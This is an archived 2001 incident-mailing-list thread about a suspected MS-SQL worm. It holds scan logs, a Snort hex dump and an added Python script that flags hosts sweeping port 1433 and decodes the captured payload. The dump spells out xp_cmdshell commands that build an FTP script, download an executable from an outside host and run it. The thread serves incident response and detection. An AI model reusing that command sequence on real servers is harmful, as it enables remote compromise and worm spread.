Hmm... Looks like a worm that exploits MSSQL, downloads itself from philamuseum.netreach.net/pub/tmp/dnsservice.exe via anonymous FTP access and starts it...

JaBBa.

----- Original Message -----
From: "Douglas P. Brown" <dugbrownat_private>
To: <incidentsat_private>; <unisogat_private>
Cc: "ITS Security" <securityat_private>
Sent: Tuesday, November 20, 2001 5:54 PM
Subject: MS-SQL Worm?

>
> We saw a scan come in looking for systems answering on 1433, and
> immediately saw several systems start scanning out for other systems
> answering on 1433 - worm behavior? Has anyone else seen this?
>
> thanks,
> -Doug
> --
> Douglas P. Brown
> University of North Carolina
> Manager of Security Resources
> 105 Abernethy Hall
>
>
> Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
> Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*
>
> [**] MS-SQL xp_cmdshell - program execution [**]
> 11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
> TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
> ***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
> 03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
> 70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
> 00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
> 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
> 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
> 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
> 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
> 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
> 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
> 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
> 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
> 00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
> 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
> 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
> 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
> 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
> 00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
> 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
> 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
> 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
> 00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
> 00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
> 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
> 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
> 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
> 00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
> 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
> 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
> 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
> 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
> 00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
> 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
> 00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
> 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
> 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
> 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
> 00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
> 00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
> 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
> 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
> 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
> 00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
> 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
> 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
> 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
> 00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
> 00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
> 00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
> 00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
> 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
> 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
> 00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
> 00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
> 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
> 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
> 00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
> 00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
> 00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
> 01 00 00 00                                      ....
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
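Two things in Doug's report are worth being able to triage mechanically: the portscan log showing one source SYNing to many neighbours on 1433 (the "scanning out" he asks about), and the Snort hex dump, whose T-SQL batch is UTF-16LE as carried by TDS and therefore only readable one character per two bytes in the ASCII column. The script below is an added example written for this archived thread, not code from either poster or from SecurityFocus; the function names are my own, the scan log lines are copied from the report (octets anonymised as on the page, plus two constructed benign lines for x.x.10.5), and the dump is the first thirteen lines of the quoted alert.

```python
"""Triage helpers for the two kinds of evidence in the report above:
(1) portscan log lines where one host sweeps port 1433, and
(2) a Snort hex dump of a TDS packet carrying exec xp_cmdshell batches.
Added example for this archived thread; not the posters' own code."""
import re
from collections import defaultdict
from datetime import datetime

# --- (1) scan-out detection on portscan log lines ---------------------------
# Lines copied from the quoted report (x.x. octets as anonymised on the page);
# the two x.x.10.5 lines are constructed: one client retrying one SQL server.
SCAN_LOG = """\
Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
Nov 20 09:38:25 x.x.10.5:3101 -> x.x.10.20:1433 SYN ******S*
Nov 20 09:38:26 x.x.10.5:3102 -> x.x.10.20:1433 SYN ******S*
"""

SYN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s+\d\d:\d\d:\d\d)\s+"
    r"(?P<src>\S+):(?P<sport>\d+)\s+->\s+(?P<dst>\S+):(?P<dport>\d+)\s+SYN\b"
)

def parse_syn_line(line):
    """Return (timestamp, src, dst, dport) for a portscan SYN line, else None."""
    m = SYN_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less; deltas only
    return ts, m["src"], m["dst"], int(m["dport"])

def find_scanners(lines, port=1433, min_targets=5, window_s=60):
    """Sources that SYN to at least min_targets distinct hosts on `port` within
    window_s seconds: one host hitting many neighbours, as in the report."""
    seen = defaultdict(dict)  # src -> {dst: time of first contact}
    for line in lines:
        rec = parse_syn_line(line)
        if rec is None or rec[3] != port:
            continue
        ts, src, dst, _ = rec
        seen[src].setdefault(dst, ts)
    hits = {}
    for src, targets in seen.items():
        stamps = sorted(targets.values())
        for i in range(len(stamps)):  # sliding window over first-contact times
            j = i
            while j + 1 < len(stamps) and (stamps[j + 1] - stamps[i]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 >= min_targets:
                hits[src] = sorted(targets)
                break
    return hits

# --- (2) recovering the T-SQL batch from the Snort hex dump ------------------
# First 13 dump lines of the quoted "MS-SQL xp_cmdshell" alert, quote prefix removed.
HEXDUMP = """\
03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

def hexdump_to_bytes(dump):
    """Concatenate the up-to-16 leading hex pairs of each Snort dump line;
    the ASCII column on the right is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:16]:
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def extract_utf16_strings(data, min_chars=4):
    """TDS carries SQL text as UTF-16LE, so printable runs look like
    e\\0x\\0e\\0c\\0. Return each run of >= min_chars chars, decoded and stripped."""
    run = re.compile(rb"(?:[\x20-\x7e\x0a]\x00){%d,}" % min_chars)
    return [m.group().decode("utf-16-le").strip() for m in run.finditer(data)]

def find_xp_cmdshell(strings):
    """Each statement of the batch (one per line) that invokes xp_cmdshell."""
    return [stmt.strip() for s in strings for stmt in s.split("\n")
            if "xp_cmdshell" in stmt.lower()]

if __name__ == "__main__":
    for src, targets in find_scanners(SCAN_LOG.splitlines()).items():
        print(f"{src} swept {len(targets)} hosts on 1433: {', '.join(targets)}")
    for stmt in find_xp_cmdshell(extract_utf16_strings(hexdump_to_bytes(HEXDUMP))):
        print("xp_cmdshell statement:", stmt)
```

Run stand-alone it reports both sweeping sources from the log and prints the first two decoded `exec xp_cmdshell` statements from the dump, which match the ASCII column of the alert. The first UTF-16 run recovered is `sp_prepare`, the RPC the batch is wrapped in, which is why a plain ASCII content match on `xp_cmdshell` would miss this traffic and why the Snort rule that fired here has to match the wide-character form.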
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:29:17 PST